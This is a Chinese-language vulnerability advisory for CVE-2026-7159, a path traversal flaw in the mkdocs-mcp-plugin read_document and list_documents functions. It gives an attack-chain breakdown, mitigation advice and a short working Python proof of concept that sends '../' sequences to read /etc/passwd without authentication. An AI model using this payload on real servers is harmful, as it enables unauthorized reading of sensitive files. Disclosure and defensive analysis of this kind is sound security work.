CVE-2026-7159 mkdocs-mcp-plugin路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7159

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

douinc mkdocs-mcp-plugin

漏洞概述

douinc mkdocs-mcp-plugin 0.4.1及之前版本被发现存在路径遍历漏洞。该漏洞影响server.py文件中的read_document和list_documents函数。由于未对用户输入的docs_dir或file_path参数进行严格的过滤和校验，未经身份认证的攻击者可以通过网络发起远程攻击。攻击者能够利用此漏洞遍历服务器文件系统，读取敏感文件，对机密性、完整性和可用性造成低程度影响。目前漏洞利用细节已公开，厂商计划近期发布修复版本。

技术细节

该漏洞位于 douinc/mkdocs-mcp-plugin 项目的 server.py 文件中。核心问题在于 read_document 和 list_documents 这两个函数直接使用了用户可控的参数 docs_dir 和 file_path，而没有进行有效的路径规范化或安全校验（例如检查是否包含 "../" 字符）。攻击者可以向受影响的服务端发送特制的 HTTP 请求，在参数中嵌入路径遍历序列（如 "../"）。由于攻击无需用户交互且无需认证（PR:N），攻击者能够突破预期的文档根目录限制，访问服务器操作系统上的任意文件。攻击向量为网络（AV:N），利用难度低（AC:L），成功利用可导致信息泄露（C:L）。虽然CVSS评分中完整性和可用性影响为低，但主要风险在于敏感配置文件或源代码泄露。根据披露信息，漏洞利用代码已经公开，这意味着潜在的攻击者可以轻易编写自动化脚本进行扫描和攻击，增加了被利用的风险。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行 douinc mkdocs-mcp-plugin 且版本低于等于 0.4.1 的目标服务器。

STEP 2

武器化

攻击者构造包含路径遍历字符（如 "../"）的恶意数据包，目标是 server.py 中的 read_document 或 list_documents 接口。

STEP 3

投递

攻击者向目标服务器发送特制的 HTTP GET 或 POST 请求，将恶意参数 docs_dir 或 file_path 注入到请求中。

STEP 4

利用

服务器端接收到请求后，未对参数进行过滤直接传递给文件操作函数，导致代码读取了预期目录之外的文件（如 /etc/passwd）。

STEP 5

影响

服务器将敏感文件内容返回给攻击者，导致信息泄露，攻击者可利用获取的信息进行进一步的渗透攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://localhost:8000/read_document"

# Malicious payload to traverse to /etc/passwd
# The vulnerability is in 'docs_dir' or 'file_path'
payload = {
    "docs_dir": "../../../../etc",
    "file_path": "passwd"
}

try:
    # Sending the request without authentication
    response = requests.get(target_url, params=payload, timeout=5)

    # Check if the response indicates a successful file read
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Exploit successful! File content retrieved:")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

douinc mkdocs-mcp-plugin <= 0.4.1

防御指南

临时缓解措施

建议立即暂停受影响版本的服务使用，直至官方补丁发布。在代码层面，可以在 server.py 中添加路径检查逻辑，确保解析后的绝对路径位于预期的文档根目录下。例如，使用 `os.path.realpath()` 获取规范路径，并检查其是否以允许的根目录前缀开头。此外，建议在防火墙层面限制对插件端口的非必要外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7159
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7159
3 Details https://www.cvedetails.com/cve/CVE-2026-7159/
4 VulDB https://vuldb.com/cve/CVE-2026-7159
5 Link https://github.com/douinc/mkdocs-mcp-plugin/
6 Link https://github.com/douinc/mkdocs-mcp-plugin/issues/6
7 Link https://github.com/douinc/mkdocs-mcp-plugin/issues/6#issuecomment-4223718119
8 Link https://vuldb.com/submit/802063
9 Link https://vuldb.com/vuln/359758
10 Link https://vuldb.com/vuln/359758/cti